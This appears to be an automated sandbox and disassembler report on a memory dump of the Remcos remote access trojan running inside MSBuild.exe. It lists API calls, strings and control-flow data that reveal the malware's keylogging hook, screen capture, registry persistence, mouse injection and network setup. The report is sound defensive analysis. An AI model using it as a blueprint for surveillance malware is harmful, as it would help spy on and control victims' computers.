404c9e 28 API calls 46960->47303 46963 40e053 46965 401f66 28 API calls 46963->46965 46967 40e062 46965->46967 46966 40e12a 47125 40cbac 46966->47125 46971 41a686 79 API calls 46967->46971 46969 41ae08 28 API calls 46970 40e0a4 46969->46970 47117 412584 RegOpenKeyExW 46970->47117 46973 40e067 46971->46973 46975 401eea 26 API calls 46973->46975 46975->46957 46978 401e13 26 API calls 46981 40e0c5 46978->46981 46979 40e0ed DeleteFileW 46980 40e0f4 46979->46980 46979->46981 46983 41ae08 28 API calls 46980->46983 46981->46979 46981->46980 46982 40e0db Sleep 46981->46982 47304 401e07 46982->47304 46985 40e104 46983->46985 47122 41297a RegOpenKeyExW 46985->47122 46988 401e13 26 API calls 46989 40e121 46988->46989 46990 401e13 26 API calls 46989->46990 46990->46966 46991->46677 46992->46683 46993->46681 46994->46691 46995->46693 46996->46696 46997->46671 46998->46674 46999->46678 47000->46700 47001->46702 47002->46704 47003->46707 47005 44dddb 47004->47005 47006 44ddd2 47004->47006 47005->46714 47009 44dcc8 51 API calls 4 library calls 47006->47009 47008->46714 47009->47005 47011 41bd22 LoadLibraryA GetProcAddress 47010->47011 47012 41bd12 GetModuleHandleA GetProcAddress 47010->47012 47013 41bd4b 32 API calls 47011->47013 47014 41bd3b LoadLibraryA GetProcAddress 47011->47014 47012->47011 47013->46719 47014->47013 47308 41a63f FindResourceA 47015->47308 47018 43a88c ___crtLCMapStringA 21 API calls 47019 40e192 _Yarn 47018->47019 47020 401f86 28 API calls 47019->47020 47021 40e1ad 47020->47021 47022 401eef 26 API calls 47021->47022 47023 40e1b8 47022->47023 47024 401eea 26 API calls 47023->47024 47025 40e1c1 47024->47025 47026 43a88c ___crtLCMapStringA 21 API calls 47025->47026 47027 40e1d2 _Yarn 47026->47027 47311 406052 47027->47311 47029 40e205 47029->46721 47031 40e8ca 47030->47031 47033 40e8da 47031->47033 47314 40200a 26 API calls 47031->47314 47033->46729 47315 401e8f 47034->47315 47036 40bee1 CreateMutexA GetLastError 47036->46776 47317 41b15b 47037->47317 47042 
401eef 26 API calls 47043 41a49f 47042->47043 47044 401eea 26 API calls 47043->47044 47045 41a4a7 47044->47045 47046 41a4fa 47045->47046 47047 412513 31 API calls 47045->47047 47046->46781 47048 41a4cd 47047->47048 47049 41a4d8 StrToIntA 47048->47049 47050 41a4ef 47049->47050 47051 41a4e6 47049->47051 47053 401eea 26 API calls 47050->47053 47325 41c102 28 API calls 47051->47325 47053->47046 47055 40698f 47054->47055 47056 4124b7 3 API calls 47055->47056 47057 406996 47056->47057 47057->46793 47057->46794 47059 41ae1c 47058->47059 47326 40b027 47059->47326 47061 41ae24 47061->46807 47063 4128c0 47062->47063 47064 406052 28 API calls 47063->47064 47065 4128d5 47064->47065 47066 401fbd 28 API calls 47065->47066 47067 4128e5 47066->47067 47068 4126d2 29 API calls 47067->47068 47069 4128ef 47068->47069 47070 401eea 26 API calls 47069->47070 47071 4128fc 47070->47071 47071->46857 47073 412722 47072->47073 47076 4126eb 47072->47076 47074 401eea 26 API calls 47073->47074 47075 40dd3b 47074->47075 47075->46860 47077 4126fd RegSetValueExA RegCloseKey 47076->47077 47077->47073 47079 409536 _wcslen 47078->47079 47080 409541 47079->47080 47081 409558 47079->47081 47083 40c89e 31 API calls 47080->47083 47082 40c89e 31 API calls 47081->47082 47084 409560 47082->47084 47085 409549 47083->47085 47087 401e18 26 API calls 47084->47087 47086 401e18 26 API calls 47085->47086 47102 409553 47086->47102 47088 40956e 47087->47088 47089 401e13 26 API calls 47088->47089 47091 409576 47089->47091 47090 401e13 26 API calls 47092 4095ad 47090->47092 47350 40856b 28 API calls 47091->47350 47335 409837 47092->47335 47095 409588 47097 4028cf 28 API calls 47095->47097 47098 409593 47097->47098 47099 401e18 26 API calls 47098->47099 47100 40959d 47099->47100 47101 401e13 26 API calls 47100->47101 47101->47102 47102->47090 47104 403b40 28 API calls 47103->47104 47105 41a7f1 47104->47105 47495 403cbb 47105->47495 47107 41a7fd 47108 4028cf 28 API calls 47107->47108 47109 41a807 47108->47109 47110 
401e13 26 API calls 47109->47110 47111 41a810 47110->47111 47112 401e13 26 API calls 47111->47112 47113 40dfc3 47112->47113 47113->46937 47115 40e08b 47114->47115 47116 41248f RegQueryValueExA RegCloseKey 47114->47116 47115->46966 47115->46969 47116->47115 47118 4125b0 RegQueryValueExW RegCloseKey 47117->47118 47119 4125dd 47117->47119 47118->47119 47120 403b40 28 API calls 47119->47120 47121 40e0ba 47120->47121 47121->46978 47123 412992 RegDeleteValueW 47122->47123 47124 40e117 47122->47124 47123->47124 47124->46988 47126 40cbc5 47125->47126 47127 41246e 3 API calls 47126->47127 47128 40cbcc 47127->47128 47132 40cbeb 47128->47132 47509 401602 47128->47509 47130 40cbd9 47512 4127d5 RegCreateKeyA 47130->47512 47133 413fd4 47132->47133 47134 413feb 47133->47134 47529 41aa73 47134->47529 47136 413ff6 47137 401d64 28 API calls 47136->47137 47138 41400f 47137->47138 47139 43a5e7 42 API calls 47138->47139 47140 41401c 47139->47140 47141 414021 Sleep 47140->47141 47142 41402e 47140->47142 47141->47142 47143 401f66 28 API calls 47142->47143 47144 41403d 47143->47144 47145 401d64 28 API calls 47144->47145 47146 41404b 47145->47146 47147 401fbd 28 API calls 47146->47147 47148 414053 47147->47148 47149 41afc3 28 API calls 47148->47149 47150 41405b 47149->47150 47533 404262 WSAStartup 47150->47533 47152 414065 47153 401d64 28 API calls 47152->47153 47154 41406e 47153->47154 47155 401d64 28 API calls 47154->47155 47216 4140ed 47154->47216 47156 414087 47155->47156 47157 401d64 28 API calls 47156->47157 47158 414098 47157->47158 47160 401d64 28 API calls 47158->47160 47159 41afc3 28 API calls 47159->47216 47161 4140a9 47160->47161 47162 401d64 28 API calls 47161->47162 47164 4140ba 47162->47164 47163 4085b4 28 API calls 47163->47216 47166 401d64 28 API calls 47164->47166 47165 401eef 26 API calls 47165->47216 47167 4140cb 47166->47167 47168 401d64 28 API calls 47167->47168 47169 4140dd 47168->47169 47557 404101 87 API calls 47169->47557 47171 401f66 28 API calls 47171->47216 
[Graph residue omitted: the text extracted from the rendered call graph (node ids, function addresses, API-call counts and edges such as 47216->47159) is not readable outside the image.]

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Control-flow Graph

Function 418754 (rendered graph omitted; basic blocks, their calls and their successor blocks recovered from the graph's text residue):
• 418754-418780: call 404bb1, call 403b60; -> 418782, 4187b6
• 418782-4187b1: call 404bb1 * 3; -> 41897f
• 4187b6-4187b9: -> 418816, 4187bb
• 4187bb-418811: call 404bb1 * 4, call 418abe; -> 4188d4
• 418816-418819: -> 418876, 41881b
• 41881b-418874: call 404bb1 * 4, call 4185d7, call 4189b0; -> 4188d4
• 418876-418879: -> 41887b, 4188da
• 41887b-4188cf: call 404bb1 * 4, call 4185d7, call 418a11; -> 4188d4
• 4188d4-4188d5: -> 418997
• 4188da-4188dd: -> 41892b, 4188df
• 4188df-418929: call 404bb1 * 3, call 4185d7, call 418a72; -> 418997
• 41892b-41892e: -> 418930, 418935
• 418930-418933: -> 41893d
• 418935-418938: -> 41893a, 41894c
• 41893a-41893b: -> 41893d
• 41893d-41894a: mouse_event; -> 418997
• 41894c-41894f: -> 418997, 418951
• 418951-41897a: call 404bb1 * 3; -> 41897f
• 41897f-418992: call 417a88; -> 418997
• 418997-4189af: call 401eea * 2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 68e9d817cbe434b414e4c0598ca2ad9f35c3e0d7e388fcdaa09fa35b29c3df5c
• Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
• Opcode Fuzzy Hash: 68e9d817cbe434b414e4c0598ca2ad9f35c3e0d7e388fcdaa09fa35b29c3df5c
• Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797

Control-flow Graph

Function 4099e4 (rendered graph omitted; basic blocks, their calls and their successor blocks recovered from the graph's text residue):
• 4099e4-4099fd: -> 409a63, 4099ff
• 4099ff-409a19: GetModuleHandleA, SetWindowsHookExA; -> 409a63, 409a1b
• 409a1b-409a61: GetLastError, call 41ad46, call 404c9e, call 401f66, call 41a686, call 401eea; -> 409a91
• 409a63-409a73: GetMessageA; -> 409a75, 409a8f
• 409a75-409a8d: TranslateMessage, DispatchMessageA; -> 409a63, 409a8f
• 409a8f: -> 409a91
• 409a91-409a96
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
• Keylogger initialization failure: error , xrefs: 00409A32
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
• Opcode ID: 8442bfc201b1d46ee8be69c69a66d86bd1dfaf312b065ba960bc2002d605c316
• Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
• Opcode Fuzzy Hash: 8442bfc201b1d46ee8be69c69a66d86bd1dfaf312b065ba960bc2002d605c316
• Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                • API String ID: 2281282204-3981147832
                                                                                                • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-1507639952
                                                                                                • Opcode ID: ef5d66ee4bb06ff3c05ed398769215b11115209f5723cf7ddc80ae7be6ba4d47
                                                                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                • Opcode Fuzzy Hash: ef5d66ee4bb06ff3c05ed398769215b11115209f5723cf7ddc80ae7be6ba4d47
                                                                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,00000006,?,00000000), ref: 0043294C
                                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,00000006), ref: 00432962
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,00000006), ref: 00432974
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID:
                                                                                                • API String ID: 4229901323-0
                                                                                                • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: recv
                                                                                                • String ID:
                                                                                                • API String ID: 1507349165-0
                                                                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                • API String ID: 2830904901-1887556364
                                                                                                • Opcode ID: 1c403215e1709068eefe7935be927690cc0cfa236e8e5c75288ef11f9a8b3fd0
                                                                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                • Opcode Fuzzy Hash: 1c403215e1709068eefe7935be927690cc0cfa236e8e5c75288ef11f9a8b3fd0
                                                                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                • DeleteObject.GDI32(?), ref: 00418107
                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
